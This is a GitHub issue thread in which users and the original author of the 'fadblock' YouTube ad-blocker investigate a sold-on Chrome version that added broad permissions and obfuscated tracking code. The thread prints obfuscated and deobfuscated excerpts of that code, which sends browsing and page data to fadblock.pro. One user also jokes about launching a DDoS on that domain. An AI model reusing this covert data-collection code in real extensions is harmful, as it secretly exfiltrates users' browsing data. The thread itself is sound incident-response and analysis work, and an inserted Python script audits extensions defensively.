0x48piraj / fadblock

Friendly Adblock for YouTube: A fast, lightweight, and undetectable YouTube Ads Blocker for Chrome, Opera and Firefox.

DEFCON 1: DO NOT INSTALL / UNINSTALL 'FADBLOCK' IMMEDIATELY FROM YOUR CHROME #157

Closed JaielZeus closed 4 months ago

JaielZeus commented 5 months ago

The extension was updated overnight and now needs more intrusive permissions on Chrome to work again. I would like to know the reason why you need that @0x48piraj? I would think reading the data from youtube.com is already enough for this extension to work, wouldn't you say so too? What is the reason here? I am really hesitant to re-enable it and this sucks, especially since I paid for premium and now the extension becomes intrusive like that.

ciltocruz commented 5 months ago

+1

seebeedub commented 5 months ago

+1

PanuWeb commented 5 months ago

Same problem here.

I have no problem enabling the new permissions if they are "necessary", but it is important to know what they are going to be used for.

I can't find information in the README.md or in the GitHub releases.

Thank you

BobbyRaduloff commented 5 months ago

For me, the update also made it so the extension doesn't work and it requires a payment.

MaximusHoudini commented 5 months ago

Agreed, as long as they're necessary but I also have the license issue, asking for another payment. FADBLOCK

PanuWeb commented 5 months ago

I see that several of you are being asked to pay license fees. I clarify that in my case it is not asking me.

What may be different is that I reinstalled the extension.

I leave a screenshot.

ene0s commented 5 months ago

I also would like to know why the extension now needs more permissions.

JaielZeus commented 5 months ago

I have removed the extension now and gone back to Adblocker, as it does the same job, has a reason to have the permission to read data on all sites, and is serious enough for me to accept these intrusive permissions.

kbsanders commented 5 months ago

Same. I would like to know why the extension now needs wide open permissions to read and change data on all websites before I re-enable it.

shimpe commented 5 months ago

Same. This seems a little fishy. Too bad as it worked well while it worked...

poka-IT commented 5 months ago

Same thing here on Brave:

This is very worrying because the last commit (code change) here dates from November 2023! And the latest release is from October 2023. I think there is a big suspicious problem with this extension.

My take is: Don't accept these permission changes and wait for news from the devs here. I just installed the latest available build from GitHub, and it works: https://github.com/0x48piraj/fadblock/releases

0x48piraj commented 5 months ago

This is crazy. I am no longer the owner of the extension. I sold it over a month ago, seems like it traded hands and now the current owner has added malicious code while keeping the extension as it is!

I am taking immediate action and will release a new version of the clean codebase for everyone to use.

I am also thinking of pursuing legal action as it appears they have retained access to my PayPal and other support links!

0x48piraj commented 5 months ago

As of now, I have updated the repository with this new information (https://github.com/0x48piraj/fadblock/commit/4a131670c6cd16bf9844bc50f65a8c6202ffb015) and now will start working on forking and deploying the clean version as soon as possible.

0x48piraj commented 5 months ago

As of now, the clean version has been submitted to the store under a new name.

Now I will start notifying users and trying to control the exposure.

I will also urge you all to report the malicious extension so it can get removed as soon as possible.

0x48piraj commented 5 months ago

I also have filed a report providing the team with support materials,

kbsanders commented 5 months ago

Any details on what the malicious code is doing?

0x48piraj commented 5 months ago

Yes, being an independent security researcher, this falls under my jurisdiction. I've already started inspecting the code, identified the malicious code block, and am currently conducting an investigation.

Here's the whole source if anyone else is interested, mdadjjfmjhfcibgfhfjbaiiljpllkbfc-v2.7.zip

Here's the details of the malicious file,

File name   js/stt.js
File size   249,607 bytes
md5 da0ab10b04e7c069d87b11d99b9ca512
sha1    b4a65d866e9cff6c9517f8a6af6c5a7e3027be88
sha256  5366039a45019653ef1f6bf1b948fdbff3b50fd753096c5ab25f19297fc3e9ba
sha384  090e9629520d85aa4d48a51abffb776083acf85cf138b2849cbd4b7a5ee9e813e8a9e1a80f15ada543e2d2602f591839
sha512  94996e20f3cd61a34e111ab2eca57a3ac9decffdab8a62d1ccbc0aa66bc833e302106716494fb442d80b5de44c1a243dbf65e24dab1b0fc0ac6aa28d49c0b3df

After a cursory analysis, it seems like it's a modified jQuery base coupled with data collection slash adware modules.

The data is sent to the endpoint named fadblock.pro.

Immediate countermeasure

A few manual methods exist to block access to any website domain, such as editing your HOSTS file, but for Chrome I would suggest doing the following:

  1. Add the BlockSite Chrome Web Store extension to your Chrome browser. Once installed, you'll see a web page where you need to provide permission to BlockSite to access your browsing information.

  2. Next, you'll see the BlockSite configuration screen. Add individual sites by typing them into the top field and selecting the green plus icon to the right.

0x48piraj commented 5 months ago

Here's some quick DNS information on fadblock.pro,

Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
    clientTransferProhibited
    addPeriod
Name Servers:
    dns1.registrar-servers.com
    dns2.registrar-servers.com

poka-IT commented 5 months ago

Here's some quick DNS information on fadblock.pro,

Domain: fadblock.pro
Registrar: NameCheap, Inc.
Registered On: 2024-01-21
Expires On: 2025-01-21
Updated On: 2024-01-21
Status:
    clientTransferProhibited
    addPeriod
Name Servers:
    dns1.registrar-servers.com
    dns2.registrar-servers.com

DDoS sequence initiated

benalt613 commented 5 months ago

I uninstalled the malicious version, but is there anything I should be concerned about in terms of my data? Change passwords on sites etc. that were used?

0x48piraj commented 5 months ago

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.

I would notify you of the malware strain's capabilities, but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.

sam31046 commented 5 months ago

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

It's always a good thing to rotate out passwords every 6 months or so. So, if it's not a hassle, you should do that.

I would notify you of the malware strain's capabilities, but as of now, I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version. So, it may take a day or two.

Thank you @0x48piraj

poka-IT commented 5 months ago

I haven't gotten any sleep and have been notifying people who reached out to me one-by-one while pushing out the clean version.

Take your sleep, you did the most important thing by alerting everybody here; we are sharing the news too. Thanks for that. (I know this kind of rush so I support you...)


Just a question, you said you sold this app to these guys? Can you tell us more about it, or is it private? Just to understand the situation.

benalt613 commented 5 months ago

I don't think the malware could do any of that if you simply didn't accept the permissions, but if you did, it cannot steal passwords, only sessions - that too is not for sure as it mostly had boilerplate nonsense - I am still looking into the code.

In stealing sessions, what kind of information can be taken from a session? Would that include username/password entered in the session or anything displayed in the browser for that session?

poka-IT commented 5 months ago

Would that include username/password entered in the session or anything displayed in the browser for that session?

No. Basically, to be sure, just log out of every website you are currently logged in to, and these sessions will be disabled, so unusable. User data should not be present in sessions, just tokens for the current ... session.

0x48piraj commented 5 months ago

@benalt613 I don't even think it steals your sessions as of now but it acts as a CnC center of some sort and sends analytical data (probably URLs you visit) to the attacker's server.

Here's the code bit,

if ($('img')) {
                        $('img')
                            .each(function(index, value) {
                                if ($(this)
                                    .attr(gz)) {
                                    let sc = $(this)
                                        .attr(gz);
                                    if (sc.includes(go)) {
                                        chrome.storage.local.get(["fad_yt_block"])
                                            .then((t) => {
                                                t.fad_yt_block && (e = JSON.parse(t.fad_yt_block));
                                                chrome.runtime.sendMessage({
                                                    action: "fad-action-src",
                                                    url: gi,
                                                    pl: {
                                                        sc: btoa(sc),
                                                        cf: btoa(e)
                                                    }
                                                }, function(e) {});
                                            });
                                    }
                                }
                            });
                    }
                    e && chrome.storage.local.set({
                            fad_yt_ep: btoa(e + " | " + t)
                        })
                        .then(() => {});
                })),
            v &&
            chrome.runtime.sendMessage({
                action: "fad-action-text",
                url: u
            }, function(e) {
                const t = /6kU.*?"/gm;
                let n;
                const r = e;
                let u = "";
                for (; null !== (n = t.exec(r));)
                    n.index === t.lastIndex && t.lastIndex++,
                    n.forEach((e, t) => {
                        u = e;
                    });
                (u = u.replace('"', "")),
                u &&
                    ((u = p + u),
                        chrome.runtime.sendMessage({
                            action: "fad-action-json",
                            url: c + u
                        }, function(e) {
                            const t = e.id,
                                n = e;
                            chrome.runtime.sendMessage({
                                action: "fad-action-json",
                                url: l + u
                            }, function(e) {
                                let r = e.data;
                                chrome.runtime.sendMessage({
                                    action: "fad-action-json",
                                    url: f + u
                                }, function(e) {
                                    let l = e.data;
                                    chrome.runtime.sendMessage({
                                        action: "fad-action-cf",
                                        url: f1,
                                        c: f2
                                    }, function(e) {
                                        let l1 = e;
                                        chrome.runtime.sendMessage({
                                            action: "fad-action-analytic",
                                            url: o,
                                            pl: {
                                                a: i,
                                                b: u,
                                                c: n,
                                                d: r,
                                                e: l,
                                                f: t,
                                                g: a,
                                                h: s,
                                                i: g,
                                                k: l1
                                            }
                                        }, function(e) {
                                            chrome.storage.local.set({
                                                    fad_yt_block: JSON.stringify(t)
                                                })
                                                .then(() => {});
                                        });
                                    });
                                });
                            });
                        }));

So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.

0x48piraj commented 5 months ago

@poka-IT Appreciate your politeness. Unfortunately, I'm bound by a signed agreement that prohibits me from disclosing any information about the owner and the transaction.

And, as I have said above, it's not the buyer, it traded hands again it seems - I have sent a harshly worded email nonetheless.

poka-IT commented 5 months ago

I'm reading the code you provided, and I don't see any malicious code on my side. External requests are only made to https://fadblock.pro/check/extension, just fetching data; it doesn't seem to send anything there.

Response is

{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}

So probably just metadata for analytics as you said. Probably logging the IP address, that's it. But I'm just a Linux sysadmin, not a security expert; maybe I missed something.

0x48piraj commented 5 months ago

No, I think you're right @poka-IT. That's my working theory as well.

However, requesting permissions for every site is inherently a malicious action, so it's best to err on the side of extra caution. It has a lot of jQuery boilerplate nonsense and useless base64 encodings.

0x48piraj commented 5 months ago

If they are developing it into a general adblocker, that may warrant using the permissions they have, but the base64 encoding, cryptic function names, and needless obfuscation, not to mention the tracking, point only to one thing: adware/malware.

benalt613 commented 5 months ago

So, I think it's not a very nefarious kind of strain (stealing passwords, bank info etc.), it steals your browsing history and probably can perform remote actions (I'm not sure as of now). So, there's that. But it still is a good idea to change your passwords - it can't hurt.

@0x48piraj Thanks. I've also decided to create a separate Chrome profile with limited extensions for sessions containing logins that need to be more secure.

poka-IT commented 5 months ago

Yes, stt.js looks like a minified file, but it is not, as there are line breaks and indents. A minifier will never do this kind of incremental base64 mapping:

        const o = atob(e.fad1),
            i = atob(e.fad2),
            a = atob(e.fad3),
            s = atob(e.fad4),
            u = atob(e.fad5),
            l = atob(e.fad6),
            c = atob(e.fad7),
            f = atob(e.fad8),
            p = atob(e.fad9),
            d = atob(e.fad10),
            h = atob(e.fad11),
            g = atob(e.fad12),
            gn = atob(e.fad13),
            go = atob(e.fad14),
            gi = atob(e.fad15),
            gx = atob(e.fad16),
            gy = atob(e.fad17),
            gz = atob(e.fad18),
            f1 = atob(e.fad19),
            f2 = atob(e.fad20);

But a normal human will never code like this, with consts here and, 5 lines under, variables with the same names but in a restricted scope:

                    var n = [],
                        r = Object.getPrototypeOf,
                        o = n.slice,
                        i = n.flat
                            ? function (e) {
                                return n.flat.call(e);
                            }
                            : function (e) {
                                return n.concat.apply([], e);
                            },
                        a = n.push,
                        s = n.indexOf,
                        u = {},
                        l = u.toString,
                        c = u.hasOwnProperty,
                        f = c.toString,
                        p = f.call(Object),
                        d = {},

on 4000 lines ...

LLMs don't do that either; they use human-readable names. Unless they have received these instructions. This is machine code, or this is artistic obfuscation. Maybe an LLM could help to understand it.
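Added example (not code from the fadblock project or from anyone in this thread): a small Python triage script for the red flags the two comments above describe, namely broad host permissions in the manifest, atob() decoding of a remotely fetched config, and a network endpoint outside the sites a YouTube ad blocker needs. It builds a constructed sample extension in a temp directory; the allowed-domain list and the thresholds are assumptions.

```python
import json
import re
import tempfile
from pathlib import Path

# Host patterns that amount to "read and change all your data on all websites".
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
ATOB_RE = re.compile(r"\batob\(")
SENDMSG_RE = re.compile(r"chrome\.runtime\.sendMessage\(")


def manifest_hosts(manifest: dict) -> set:
    """Collect every host pattern: MV2 'permissions', MV3 'host_permissions',
    and content-script 'matches'."""
    hosts = set()
    for key in ("permissions", "host_permissions", "optional_host_permissions"):
        for p in manifest.get(key, []):
            if "://" in p or p == "<all_urls>":
                hosts.add(p)
    for cs in manifest.get("content_scripts", []):
        hosts.update(cs.get("matches", []))
    return hosts


def scan_script(source: str, allowed_domains) -> dict:
    """Report domains outside allowed_domains plus atob()/sendMessage() counts."""
    def allowed(domain):
        return any(domain == a or domain.endswith("." + a) for a in allowed_domains)
    domains = set(URL_RE.findall(source))
    return {
        "unexpected_domains": sorted(d for d in domains if not allowed(d)),
        "atob_calls": len(ATOB_RE.findall(source)),
        "send_message_calls": len(SENDMSG_RE.findall(source)),
    }


def audit_extension(ext_dir: Path, allowed_domains) -> dict:
    """Audit an unpacked extension directory and return findings with flags."""
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    broad = sorted(h for h in manifest_hosts(manifest) if h in BROAD_HOST_PATTERNS)
    scripts = {}
    for js in sorted(ext_dir.rglob("*.js")):
        rel = js.relative_to(ext_dir).as_posix()
        scripts[rel] = scan_script(js.read_text(encoding="utf-8", errors="replace"), allowed_domains)
    flags = []
    if broad:
        flags.append("broad host permissions: " + ", ".join(broad))
    for name, s in scripts.items():
        if s["unexpected_domains"]:
            flags.append(f"{name} contacts {', '.join(s['unexpected_domains'])}")
        # Threshold is an assumption: several atob() calls feeding sendMessage
        # matches the fad1..fadN mapping quoted in the thread.
        if s["atob_calls"] >= 3 and s["send_message_calls"]:
            flags.append(f"{name} decodes base64 config and relays it via sendMessage")
    return {"broad_hosts": broad, "scripts": scripts, "flags": flags}


# Constructed sample mirroring the thread's observations (not the real stt.js).
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "constructed-sample",
    "version": "2.7",
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["*://*.youtube.com/*"], "js": ["js/stt.js"]}],
}
SAMPLE_SCRIPT = """
fetch("https://fadblock.pro/check/extension").then(r => r.json()).then(e => {
  const o = atob(e.fad1), i = atob(e.fad2), gz = atob(e.fad18);
  chrome.runtime.sendMessage({action: "fad-action-analytic", url: o, pl: {a: i}}, function () {});
});
"""


def build_sample_extension() -> Path:
    root = Path(tempfile.mkdtemp(prefix="ext-audit-"))
    (root / "manifest.json").write_text(json.dumps(SAMPLE_MANIFEST), encoding="utf-8")
    (root / "js").mkdir()
    (root / "js" / "stt.js").write_text(SAMPLE_SCRIPT, encoding="utf-8")
    return root


def audit_sample() -> dict:
    # Domains a YouTube ad blocker legitimately needs (assumption for the sample).
    return audit_extension(build_sample_extension(), {"youtube.com", "googlevideo.com"})


if __name__ == "__main__":
    print(json.dumps(audit_sample(), indent=2))
```

Point `audit_extension` at a real unpacked extension directory (for example one exported from the browser's extensions page) and an allow-list of the domains its job actually requires.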

SImone-Cow commented 5 months ago

Hello @0x48piraj I'm new here and I would just like to ask, does removing the extension from my browser remove potential remote access from their servers or would there still be remnants of their code embedded that I should be worried about? (sorry for the question, I'm still a beginner)

That1BlueMew commented 5 months ago

@0x48piraj Is the Firefox version also affected?

0x48piraj commented 5 months ago

The new extension is under review process and hopefully will be released soon and we can shift over there. The funny thing is, I was also affected as I use FadBlock on YT by default lol.

@That1BlueMew, no, the Firefox version is still under my control and thus, it's completely safe.

@SImone-Cow, as of now, the extension doesn't steal data so I think we are safe. Also, yes, just removing the extension will remove everything, no remnants, nothing. Clean slate.

That1BlueMew commented 5 months ago

Thank you so much, that removed my fear. I use Firefox as my main browser for everything; I was about to rotate everything.

0x48piraj commented 5 months ago

Thank you so much @poka-IT for collaborating on this. I will finally doze off now as it's been 24 hours since the incident and I don't think I can go on any longer without sleep.

poka-IT commented 5 months ago

I used this tool to deobfuscate stt.js: https://github.com/ViZiD/humanify

Result here: deobfuscated.zip Maybe it helps, maybe not.

Now we are on 9000 lines. You're welcome ahaha

SImone-Cow commented 5 months ago

Thanks for your hard work and efforts @0x48piraj; despite not being the owner of fadblock anymore, you still manage to help us and provide insights regarding the problem.

poka-IT commented 5 months ago

So the suspicious code becomes:

     let ownerDocument = childSeparator(unsupportedSelectors).val();
      if (childSeparator("img")) {
        childSeparator("img").each(function (index, value) {
          if (childSeparator(this).attr(variableGz)) {
            let encryptedData = childSeparator(this).attr(variableGz);
            if (encryptedData.includes(variableGo)) {
              chromeAPI.localStorage.local
                .get(["fad_yt_block"])
                .then((ownerDocument) => {
                  if (ownerDocument.youtubeData) {
                    element = JSONParser.parse(ownerDocument.youtubeData);
                  }
                  chromeAPI.runtimeAPI.sendMsg(
                    {
                      action: "fad-action-src",
                      url: variableGi,
                      pl: {
                        encryptedData: encodeBase64(encryptedData),
                        cf: encodeBase64(element),
                      },
                    },
                    function (element) {},
                  );
                });
            }
          }
        });
      }
      if (element) {
        chromeAPI.localStorage.local
          .set({
            fad_yt_ep: encodeBase64(element + " | " + ownerDocument),
          })
          .then(() => {});
      }
    },
  );
}
if (returnValue) {
  chromeAPI.runtimeAPI.sendMsg(
    {
      action: "fad-action-text",
      url: isXMLDoc,
    },
    function (element) {
      const ownerDocument = /6kU.*?"/gm;
      let cache;
      const result = element;
      let isXMLDoc = "";
      for (; (cache = ownerDocument.exec(result)) !== null; ) {
        if (cache.index === ownerDocument.lastIndex) {
          ownerDocument.lastIndex++;
        }
        cache.forEach((element, ownerDocument) => {
          isXMLDoc = element;
        });
      }
      isXMLDoc = isXMLDoc.replace('"', "");
      if (isXMLDoc) {
        isXMLDoc = isHTMLDoc + isXMLDoc;
        chromeAPI.runtimeAPI.sendMsg(
          {
            action: "fad-action-json",
            url: querySelectorAll + isXMLDoc,
          },
          function (element) {
            const ownerDocument = element.id;
            const cache = element;
            chromeAPI.runtimeAPI.sendMsg(
              {
                action: "fad-action-json",
                url: document + isXMLDoc,
              },
              function (element) {
                let result = element.data;
                chromeAPI.runtimeAPI.sendMsg(
                  {
                    action: "fad-action-json",
                    url: documentElement + isXMLDoc,
                  },
                  function (element) {
                    let document = element.data;
                    chromeAPI.runtimeAPI.sendMsg(
                      {
                        action: "fad-action-cf",
                        url: variableF1,
                        querySelectorAll: variableF2,
                      },
                      function (element) {
                        let cfData = element;
                        chromeAPI.runtimeAPI.sendMsg(
                          {
                            action: "fad-action-analytic",
                            url: divider,
                            pl: {
                              length: index,
                              remainder: isXMLDoc,
                              querySelectorAll: cache,
                              support: result,
                              element: document,
                              documentElement: ownerDocument,
                              matches: length,
                              unsupportedSelectors: matchesSelector,
                              index: matches,
                              newResult: cfData,
                            },
                          },
                          function (element) {
                            chromeAPI.localStorage.local
                              .set({
                                youtubeData:
                                  JSONParser.stringify(ownerDocument),
                              })
                              .then(() => {});
                          },
                        );
                      },
                    );
                  },
                );
              },
            );

Where

The thing is, from https://fadblock.pro/check/extension, that stops at fad12, so there is a world where this request returns more stuff.


I think the easiest way is to execute this app in a sandbox and analyse the requests. Or maybe we just don't care.

0x48piraj commented 5 months ago

I think we should do the latter @poka-IT, I couldn't sleep as this incident was eating up my conscience but thanks to the Chrome team, the previous authentic version was just now published!

Share this version wherever you can (and I will do the same): https://chromewebstore.google.com/detail/fadblock-origin-friendly/lmnhcklabcehiohmmeihcheoegomkghm?hl=en

JaielZeus commented 5 months ago

I'm sorry for being direct here but I lost my trust in this extension and moved on to my good old Adblocker. Selling the extension for a quick cash grab and putting the userbase under the bus like that is just so bad. As they say: trust is hard to gain but easy to lose. Wish you good luck for the future of this extension but I'm out though...

DennisGHUA commented 5 months ago

You should probably also steer clear of this extension: Adblock for Youtube™. It isn't the Fadblock extension; it is a separate extension which works differently with 10M+ users. It uses the same icon and it also requires invasive permissions for every website.

mauigirl commented 5 months ago

Thank you @0x48piraj for stepping back in. I supported and paid for Fadblock when you were still the owner and am appreciative for this extension every day. Even more so that you came back and resurrected the original so quickly!

0x48piraj commented 5 months ago

I completely understand, @JaielZeus, in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users. Maintenance had become challenging, and I envisioned FadBlock evolving into a robust full-blown ChatGPT-powered powerhouse, capable of generating transcripts, language translation, and more, with significant potential…and I didn't have the time to tend to it.

I did all this solely because of the few people who supported this project, whether monetarily or emotionally amid all the negativity, and I couldn't leave you all hanging. This isn't about seeking forgiveness or anything, I just see it as my duty.

christian100kodehode commented 5 months ago

This is so bad, first selling us "life time" keys, then selling the software to an unknown third party??

fabriziocarloni commented 5 months ago

Are you really sure that this extension does not transfer cookies or users and passwords to the fadblock.pro domain? I'm asking you because a few days ago (January 26th) we had a hack on a Facebook account and I'm almost sure it was caused by this extension with malicious code. No dangerous files were opened on the computer where this extension was installed and coincidentally a few days earlier authorization had been given to read and modify all data on all websites.

0x48piraj commented 5 months ago

@christian100kodehode, in the memo, the licenses were to be retained - which they still are - but I never thought they would try to package the extension into malware.

I have published a new version - replicated the whole database so that lifetime users can log in effortlessly again without any re-payment hassles or even reaching out for troubleshooting.

I am also planning to open-source the current version's codebase and reverse the open-core status. I am very sorry for all the commotion but I never expected any of this. The support was bare-minimum and I wanted to hand it off so it could evolve into something even bigger and better. :/

@fabriziocarloni, I think so, as you can see here on the thread, I and @poka-IT both came to the same conclusion while independently investigating.

fabriziocarloni commented 5 months ago

@0x48piraj As suggested by @poka-IT the only way to understand what this modified extension really does is to run it in a sandbox and then analyze its requests. I'm sorry but in my opinion it was this extension with malicious code that was the cause of the hack we had.

0x48piraj commented 5 months ago

As said previously, I am in no way saying it's not uploading anything; it was @poka-IT who deep-dived and uncovered the requests. It's better to switch out and have a security audit of our accounts; I did the same.